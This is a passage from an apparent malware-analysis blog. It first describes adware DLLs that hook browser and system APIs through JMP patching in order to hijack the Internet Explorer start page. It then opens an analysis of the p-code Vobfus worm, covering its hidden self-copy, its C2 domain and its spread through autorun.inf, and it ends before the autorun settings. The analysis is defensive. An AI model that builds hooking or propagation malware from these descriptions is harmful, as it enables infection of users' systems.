<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">setask.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">firefox.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">chrome.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">gsfbwsr.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">opera.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">tango.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">SaaYaa.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">Safari.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">MxCore.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">AcroRd32.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">tango3.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">tangoweb.exe</span></div>
</li>
</ul>
<div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">kswbc.dll</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">exports:</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllCanUnloadNow</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllGetClassObject</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllRegisterServer</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllUnregisterServer</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- non-malicious</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- injected into iexplore.exe only, by kswebshield.dll</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">kswebshield.dll</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">exports:</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">MatchingUWUrl</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">MatchingUrl</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">ProcessUWUrl</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">RegisterUrlProcessor</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">UnregisterUrlProcessor</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">UrlProcess</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- non-malicious</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- injected into running processes using the SetWindowsHookEx API</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- the culprit responsible for replacing the Internet Explorer start page with whatever website is set under the “sp” key in its ini file (kws.ini).</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggoM5GXfKSSeIrvimYPB7JX4zM0x78wxXUji3uUasl_98hBa8WSaOwA7aANpcYiqtFnWa9ynOSeUvHg_7Eu-76O8xi3N_PPzS8jdKb3csijc6XpUJIniAaIq0dQP2slIRLstMn87F7/s1600/55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggoM5GXfKSSeIrvimYPB7JX4zM0x78wxXUji3uUasl_98hBa8WSaOwA7aANpcYiqtFnWa9ynOSeUvHg_7Eu-76O8xi3N_PPzS8jdKb3csijc6XpUJIniAaIq0dQP2slIRLstMn87F7/s1600/55.png" height="78" width="320" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<br />
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In this figure, kswebshield.dll has already been injected into the process memory of iexplore.exe and starts to load</span> <span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">http://www.hao144.info/1/.</span></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- also hooks the following APIs in order to route execution to itself:</span></div>
</div>
</div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">
</span></div>
<div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WS2_32.WSASend</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WS2_32.Send</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">NTDLL.ZwCreateProcessEx</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">NTDLL.ZwCreateProcess</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.HttpOpenRequestA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.HttpOpenRequestW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetConnectA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetConnectW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetReadFile</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetQueryDataAvailable</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetOpenUrlA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetOpenUrlW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetCloseHandle</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CopyFileExA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CopyFileExW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CopyFileA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CopyFileW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.LoadLibraryA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.LoadLibraryW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.LoadLibraryExA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.LoadLibraryExW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CreateProcessInternalA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CreateProcessInternalW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CreateProcessW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CreateProcessA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.WinExec</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">OLEAUT32.SysAllocStringByteLen</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">OLEAUT32.SysAllocStringLen</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">SHELL32.ShellExecuteExA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">SHELL32.ShellExecuteExW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">OLE32.CoGetClassObject</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">OLE32.CoRegisterClassObject</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">OLE32.CoCreateInstance</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">SHLWAPI.SHRegGetUSValue</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">ADVAPI32.RegQueryValueExA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">ADVAPI32.RegQueryValueExW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">NSPR4.PR_LoadLibrary</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">URLMON.CoGetClassObjectFromURL</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">URLMON.URLDownloadToCacheFileA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">URLMON.URLDownloadToCacheFileW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">URLMON.URLDownloadToFileA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">URLMON.URLDownloadToFileW</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
</li>
</ul>
<div>
<span style="font-family: inherit; font-size: 15px; font-weight: normal; line-height: 17.25px; white-space: pre-wrap;"><br /></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigHuEhWys3mmRGnEa932sbzF7GtpCneAiNm7-PfUNrTz5A594c_vwpBZejIN1-SW6i9jiEQ_bJkS5oi1jjUmOghwsMpvyY7rYs1zU7eUYuFEIMi0KBZEIvFqIwzK6m7Fcbx6fm-Pbq/s1600/66.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigHuEhWys3mmRGnEa932sbzF7GtpCneAiNm7-PfUNrTz5A594c_vwpBZejIN1-SW6i9jiEQ_bJkS5oi1jjUmOghwsMpvyY7rYs1zU7eUYuFEIMi0KBZEIvFqIwzK6m7Fcbx6fm-Pbq/s1600/66.png" height="33" width="320" /></span></a></div>
<div>
<span style="font-family: inherit; font-size: 15px; font-weight: normal; line-height: 17.25px; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBVqMaxIbDrGqdgIp7v2uVPxvqVR7zk8vrOg1ltpou-xKhBUONTtruPeyo1FmuA7CQIWpb1ici0_Ulwg0oKRoyJKkOERtN-jG-L5Q4O_4D_k2w0PwNWNLDHqxgj-ENg4uhkzSFu5N4/s1600/77.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBVqMaxIbDrGqdgIp7v2uVPxvqVR7zk8vrOg1ltpou-xKhBUONTtruPeyo1FmuA7CQIWpb1ici0_Ulwg0oKRoyJKkOERtN-jG-L5Q4O_4D_k2w0PwNWNLDHqxgj-ENg4uhkzSFu5N4/s1600/77.png" height="86" width="320" /></span></a></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">
</span></div>
<div style="line-height: 1.15;">
<span style="font-family: inherit; font-size: 15px; font-weight: normal; line-height: 17px; text-align: -webkit-auto; white-space: pre-wrap;">The figure below shows how the hook is installed: the first 5 bytes of the target API are overwritten with a JMP whose relative offset points to the DLL's own code.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; font-size: 15px; font-weight: normal; line-height: 17px; text-align: -webkit-auto; white-space: pre-wrap;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9TS6bQEqqNhbK94e2ROTq1o81utGxZ2p__Ubg5a6kg3U1HiUcxMKhEDLwZGjYRkiV5zWY2XbddFcIH6_def0OtYK0i2Ws3t_rO5ABrkxNegQFQi3KMJWsquMyRx-_RZZibnkdph-D/s1600/88.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9TS6bQEqqNhbK94e2ROTq1o81utGxZ2p__Ubg5a6kg3U1HiUcxMKhEDLwZGjYRkiV5zWY2XbddFcIH6_def0OtYK0i2Ws3t_rO5ABrkxNegQFQi3KMJWsquMyRx-_RZZibnkdph-D/s1600/88.png" height="195" width="320" /></a></span></div>
<span style="font-family: Arial; font-size: 15px; font-weight: normal; line-height: 17px; text-align: -webkit-auto; white-space: pre-wrap;">
</span></div>
</div>
<div dir="ltr" style="font-family: Tahoma; font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div class="separator" style="clear: both; font-family: Tahoma; line-height: 1.15; text-align: center;">
</div>
</div>
Anonymoushttp://www.blogger.com/profile/10653752703445056399noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-41075495317354744672014-05-01T19:59:00.000-07:002014-05-01T19:59:24.262-07:00PCode Vobfus Malware<h3>
<b><span style="font-family: inherit; font-size: large;">ANALYSIS</span></b></h3>
<div>
<div style="font-family: inherit;">
<span style="font-family: inherit;">This version of the VOBFUS malware is compiled to <a href="http://en.wikipedia.org/wiki/Microsoft_P-Code" target="_blank">p-code</a>, or pseudo code (also known as packed code). Because it is p-code compiled, the malware file is smaller than the natively compiled version. And because this version needs the p-code interpreter at runtime to execute its instructions, debugging it in OllyDBG is quite demanding, especially for analysts not familiar with these instructions. Alternatively, a p-code debugger such as WKTVBDebugger can be used, since it already interprets p-code instructions.</span></div>
<div style="font-family: inherit;">
<span style="font-family: inherit;"><br /></span></div>
<div style="font-family: inherit;">
<span style="font-family: inherit;">To debug this malware in OllyDBG, set a breakpoint on MSVBVM60.DllFunctionCall to trap every Windows API the malware calls.</span></div>
<div style="font-family: inherit;">
<span style="font-family: inherit;"><br /></span></div>
<div style="font-family: inherit;">
<span style="font-family: inherit;">Use of the MSVBVM60.DllFunctionCall API is illustrated below.</span></div>
<div class="separator" style="clear: both; font-family: inherit; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLcpKA6ekT_TgK3WVy8BDr9NqIxtxXzuY410yOn1sHmJ4noQbpsayiRSCU1khqmo_aT79nOe8sKgTbuC6eiphtTYw5LkCDPcsgA0oYFSqnc2GnoeBiE1W3ikqt46qr3v__fmsyGzE/s1600/1st.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLcpKA6ekT_TgK3WVy8BDr9NqIxtxXzuY410yOn1sHmJ4noQbpsayiRSCU1khqmo_aT79nOe8sKgTbuC6eiphtTYw5LkCDPcsgA0oYFSqnc2GnoeBiE1W3ikqt46qr3v__fmsyGzE/s1600/1st.png" height="102" width="320" /></a></div>
<div style="font-family: inherit; font-weight: bold;">
<br /></div>
<div style="font-family: inherit;">
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">Upon execution, it will create a mutex with
string “A”.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">It will create a copy of itself as
%USERPROFILE%\<RandomFileName>.exe with the READONLY,
HIDDEN and SYSTEM file attributes. This copy is then executed using USER32.ShellExecuteW.</span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">Next, it will attempt to establish a
connection to ns1.theimageparlour.net.</span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;">It also enumerates all available drives
in the system and checks for removable/shared drives. It infects removable and
shared network drives by dropping multiple copies of itself together with an autorun.inf
that has the following settings.</span></span></div>
<div class="separator" style="clear: both; font-family: inherit; text-align: center;">
